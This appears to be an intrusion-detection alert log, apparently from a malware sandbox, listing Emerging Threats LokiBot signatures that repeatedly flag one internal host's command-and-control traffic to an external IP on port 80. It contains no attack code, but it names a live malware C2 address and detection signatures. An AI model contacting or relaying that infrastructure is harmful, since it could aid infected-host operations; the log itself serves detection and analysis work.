2024-10-25T10:21:58.339192+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:21:59.527535+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:01.017571+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:02.183819+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:04.446102+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:05.576112+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:06.709690+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50102	94.156.177.220	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:05.071273+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49732	TCP
2024-10-25T10:20:06.226237+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49733	TCP
2024-10-25T10:20:07.334473+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49734	TCP
2024-10-25T10:20:09.432485+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49735	TCP
2024-10-25T10:20:10.560448+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49736	TCP
2024-10-25T10:20:11.719389+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49737	TCP
2024-10-25T10:20:13.299728+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49738	TCP
2024-10-25T10:20:14.406009+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49739	TCP
2024-10-25T10:20:15.575285+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49740	TCP
2024-10-25T10:20:16.722910+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49741	TCP
2024-10-25T10:20:17.838629+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49744	TCP
2024-10-25T10:20:19.157444+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49747	TCP
2024-10-25T10:20:21.112566+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49749	TCP
2024-10-25T10:20:22.355060+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49751	TCP
2024-10-25T10:20:23.520665+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49752	TCP
2024-10-25T10:20:24.657497+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49753	TCP
2024-10-25T10:20:25.792079+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49754	TCP
2024-10-25T10:20:26.959979+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49755	TCP
2024-10-25T10:20:28.701325+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49756	TCP
2024-10-25T10:20:30.845454+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49757	TCP
2024-10-25T10:20:32.016207+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49758	TCP
2024-10-25T10:20:33.145709+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49759	TCP
2024-10-25T10:20:34.655827+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49760	TCP
2024-10-25T10:20:35.772022+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49761	TCP
2024-10-25T10:20:36.891188+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49762	TCP
2024-10-25T10:20:38.041870+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49763	TCP
2024-10-25T10:20:39.188082+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49764	TCP
2024-10-25T10:20:40.802577+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49765	TCP
2024-10-25T10:20:42.081150+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49766	TCP
2024-10-25T10:20:43.419600+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49767	TCP
2024-10-25T10:20:44.573607+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49768	TCP
2024-10-25T10:20:45.954002+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49769	TCP
2024-10-25T10:20:46.940955+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49770	TCP
2024-10-25T10:20:48.048668+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49771	TCP
2024-10-25T10:20:49.297262+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49772	TCP
2024-10-25T10:20:50.450430+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49773	TCP
2024-10-25T10:20:51.609517+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49774	TCP
2024-10-25T10:20:53.022733+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49775	TCP
2024-10-25T10:20:54.139132+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49776	TCP
2024-10-25T10:20:55.287327+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49777	TCP
2024-10-25T10:20:56.437553+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49779	TCP
2024-10-25T10:20:57.600381+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49780	TCP
2024-10-25T10:20:59.008492+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49782	TCP
2024-10-25T10:21:00.135806+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49793	TCP
2024-10-25T10:21:01.275786+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49799	TCP
2024-10-25T10:21:02.418624+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49805	TCP
2024-10-25T10:21:03.555551+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49811	TCP
2024-10-25T10:21:05.295989+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49822	TCP
2024-10-25T10:21:06.449512+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49828	TCP
2024-10-25T10:21:07.676728+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49836	TCP
2024-10-25T10:21:08.802409+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49842	TCP
2024-10-25T10:21:09.934486+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49851	TCP
2024-10-25T10:21:11.192386+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49858	TCP
2024-10-25T10:21:12.316954+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49864	TCP
2024-10-25T10:21:13.652804+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49871	TCP
2024-10-25T10:21:14.792765+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49877	TCP
2024-10-25T10:21:15.930332+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49883	TCP
2024-10-25T10:21:17.529729+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49894	TCP
2024-10-25T10:21:18.684574+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49900	TCP
2024-10-25T10:21:20.175088+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49910	TCP
2024-10-25T10:21:21.284965+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49917	TCP
2024-10-25T10:21:22.437264+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49924	TCP
2024-10-25T10:21:23.924135+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49934	TCP
2024-10-25T10:21:25.066881+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49940	TCP
2024-10-25T10:21:26.551185+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49947	TCP
2024-10-25T10:21:27.670578+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49954	TCP
2024-10-25T10:21:28.801641+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49963	TCP
2024-10-25T10:21:29.973087+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49969	TCP
2024-10-25T10:21:31.099993+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49975	TCP
2024-10-25T10:21:32.212011+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49985	TCP
2024-10-25T10:21:33.340436+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49991	TCP
2024-10-25T10:21:34.478912+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	49998	TCP
2024-10-25T10:21:35.629820+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50005	TCP
2024-10-25T10:21:36.772729+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50014	TCP
2024-10-25T10:21:37.895860+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50021	TCP
2024-10-25T10:21:39.046534+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50027	TCP
2024-10-25T10:21:40.350403+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50033	TCP
2024-10-25T10:21:41.496560+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50039	TCP
2024-10-25T10:21:42.635640+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50050	TCP
2024-10-25T10:21:43.777737+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50056	TCP
2024-10-25T10:21:44.927929+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50062	TCP
2024-10-25T10:21:46.053961+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50073	TCP
2024-10-25T10:21:47.216255+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50078	TCP
2024-10-25T10:21:48.349012+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50085	TCP
2024-10-25T10:21:49.494903+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50088	TCP
2024-10-25T10:21:50.633330+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50089	TCP
2024-10-25T10:21:52.362707+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50090	TCP
2024-10-25T10:21:53.481146+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50091	TCP
2024-10-25T10:21:54.634280+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50092	TCP
2024-10-25T10:21:55.761443+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50093	TCP
2024-10-25T10:21:56.901726+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50094	TCP
2024-10-25T10:21:58.172981+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50095	TCP
2024-10-25T10:21:59.361507+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50096	TCP
2024-10-25T10:22:00.545385+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50097	TCP
2024-10-25T10:22:02.039544+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50098	TCP
2024-10-25T10:22:03.146388+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50099	TCP
2024-10-25T10:22:05.416568+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50100	TCP
2024-10-25T10:22:06.546217+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50101	TCP
2024-10-25T10:22:07.827411+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.4	50102	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:05.061102+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:06.219416+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:07.328677+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:09.431887+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:10.553813+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:11.713418+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:13.293592+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:14.398997+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:15.568040+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:16.716991+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:17.832440+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:19.151355+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:21.110799+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:22.349091+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:23.513082+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:24.651338+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:25.786050+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:26.954108+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:28.695330+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:30.839601+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:32.009821+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:33.139480+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:34.649766+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:35.764613+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:36.884487+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:38.036103+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:39.182221+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:40.795930+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.220	80	TCP
2024-10-25T10:20:42.080957+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.220	80	TCP
2024-10-25T10:20:43.413726+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.220	80	TCP
2024-10-25T10:20:44.566821+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.220	80	TCP
2024-10-25T10:20:45.730458+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.220	80	TCP
2024-10-25T10:20:46.935092+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.220	80	TCP
2024-10-25T10:20:48.041946+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.220	80	TCP
2024-10-25T10:20:49.291568+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.220	80	TCP
2024-10-25T10:20:50.444267+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.220	80	TCP
2024-10-25T10:20:51.603400+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.220	80	TCP
2024-10-25T10:20:53.016672+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.220	80	TCP
2024-10-25T10:20:54.133034+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.220	80	TCP
2024-10-25T10:20:55.280818+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.220	80	TCP
2024-10-25T10:20:56.431956+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.220	80	TCP
2024-10-25T10:20:57.593283+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.220	80	TCP
2024-10-25T10:20:59.001743+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.220	80	TCP
2024-10-25T10:21:00.130045+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49793	94.156.177.220	80	TCP
2024-10-25T10:21:01.269869+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49799	94.156.177.220	80	TCP
2024-10-25T10:21:02.412807+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49805	94.156.177.220	80	TCP
2024-10-25T10:21:03.549599+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49811	94.156.177.220	80	TCP
2024-10-25T10:21:05.290132+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49822	94.156.177.220	80	TCP
2024-10-25T10:21:06.443742+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49828	94.156.177.220	80	TCP
2024-10-25T10:21:07.670809+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.220	80	TCP
2024-10-25T10:21:08.796273+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49842	94.156.177.220	80	TCP
2024-10-25T10:21:09.928770+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.220	80	TCP
2024-10-25T10:21:11.186518+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.220	80	TCP
2024-10-25T10:21:12.311125+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.220	80	TCP
2024-10-25T10:21:13.646861+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49871	94.156.177.220	80	TCP
2024-10-25T10:21:14.786667+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49877	94.156.177.220	80	TCP
2024-10-25T10:21:15.924397+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.220	80	TCP
2024-10-25T10:21:17.523591+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.220	80	TCP
2024-10-25T10:21:18.678850+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.220	80	TCP
2024-10-25T10:21:20.169405+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.220	80	TCP
2024-10-25T10:21:21.278945+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.220	80	TCP
2024-10-25T10:21:22.431466+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49924	94.156.177.220	80	TCP
2024-10-25T10:21:23.917885+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49934	94.156.177.220	80	TCP
2024-10-25T10:21:25.060705+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49940	94.156.177.220	80	TCP
2024-10-25T10:21:26.544494+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49947	94.156.177.220	80	TCP
2024-10-25T10:21:27.664575+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49954	94.156.177.220	80	TCP
2024-10-25T10:21:28.795766+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49963	94.156.177.220	80	TCP
2024-10-25T10:21:29.966249+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49969	94.156.177.220	80	TCP
2024-10-25T10:21:31.093840+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49975	94.156.177.220	80	TCP
2024-10-25T10:21:32.205975+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.220	80	TCP
2024-10-25T10:21:33.334821+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.220	80	TCP
2024-10-25T10:21:34.473111+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.220	80	TCP
2024-10-25T10:21:35.623881+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50005	94.156.177.220	80	TCP
2024-10-25T10:21:36.765800+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50014	94.156.177.220	80	TCP
2024-10-25T10:21:37.890035+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.220	80	TCP
2024-10-25T10:21:39.040400+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50027	94.156.177.220	80	TCP
2024-10-25T10:21:40.344341+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50033	94.156.177.220	80	TCP
2024-10-25T10:21:41.490818+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.220	80	TCP
2024-10-25T10:21:42.628356+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50050	94.156.177.220	80	TCP
2024-10-25T10:21:43.771661+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50056	94.156.177.220	80	TCP
2024-10-25T10:21:44.922014+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50062	94.156.177.220	80	TCP
2024-10-25T10:21:46.047555+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.220	80	TCP
2024-10-25T10:21:47.209475+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50078	94.156.177.220	80	TCP
2024-10-25T10:21:48.343222+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50085	94.156.177.220	80	TCP
2024-10-25T10:21:49.489044+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50088	94.156.177.220	80	TCP
2024-10-25T10:21:50.627196+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50089	94.156.177.220	80	TCP
2024-10-25T10:21:52.356229+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50090	94.156.177.220	80	TCP
2024-10-25T10:21:53.474653+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50091	94.156.177.220	80	TCP
2024-10-25T10:21:54.628216+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50092	94.156.177.220	80	TCP
2024-10-25T10:21:55.755063+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50093	94.156.177.220	80	TCP
2024-10-25T10:21:56.895578+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.220	80	TCP
2024-10-25T10:21:58.166256+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50095	94.156.177.220	80	TCP
2024-10-25T10:21:59.355701+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50096	94.156.177.220	80	TCP
2024-10-25T10:22:00.539507+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50097	94.156.177.220	80	TCP
2024-10-25T10:22:02.033727+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50098	94.156.177.220	80	TCP
2024-10-25T10:22:03.140267+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50099	94.156.177.220	80	TCP
2024-10-25T10:22:05.410348+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.220	80	TCP
2024-10-25T10:22:06.540301+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50101	94.156.177.220	80	TCP
2024-10-25T10:22:07.717612+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50102	94.156.177.220	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T10:20:05.061102+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49732	94.156.177.220	80	TCP
2024-10-25T10:20:06.219416+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.220	80	TCP
2024-10-25T10:20:07.328677+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49734	94.156.177.220	80	TCP
2024-10-25T10:20:09.431887+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.220	80	TCP
2024-10-25T10:20:10.553813+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.220	80	TCP
2024-10-25T10:20:11.713418+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49737	94.156.177.220	80	TCP
2024-10-25T10:20:13.293592+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.220	80	TCP
2024-10-25T10:20:14.398997+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.220	80	TCP
2024-10-25T10:20:15.568040+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.220	80	TCP
2024-10-25T10:20:16.716991+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.220	80	TCP
2024-10-25T10:20:17.832440+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.220	80	TCP
2024-10-25T10:20:19.151355+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.220	80	TCP
2024-10-25T10:20:21.110799+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.220	80	TCP
2024-10-25T10:20:22.349091+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.220	80	TCP
2024-10-25T10:20:23.513082+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49752	94.156.177.220	80	TCP
2024-10-25T10:20:24.651338+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.220	80	TCP
2024-10-25T10:20:25.786050+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.220	80	TCP
2024-10-25T10:20:26.954108+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.220	80	TCP
2024-10-25T10:20:28.695330+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.220	80	TCP
2024-10-25T10:20:30.839601+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.220	80	TCP
2024-10-25T10:20:32.009821+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.220	80	TCP
2024-10-25T10:20:33.139480+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.220	80	TCP
2024-10-25T10:20:34.649766+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.220	80	TCP
2024-10-25T10:20:35.764613+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.220	80	TCP
2024-10-25T10:20:36.884487+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.220	80	TCP
2024-10-25T10:20:38.036103+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.220	80	TCP
2024-10-25T10:20:39.182221+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.220	80	TCP
2024-10-25T10:20:40.795930+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.220	80	TCP
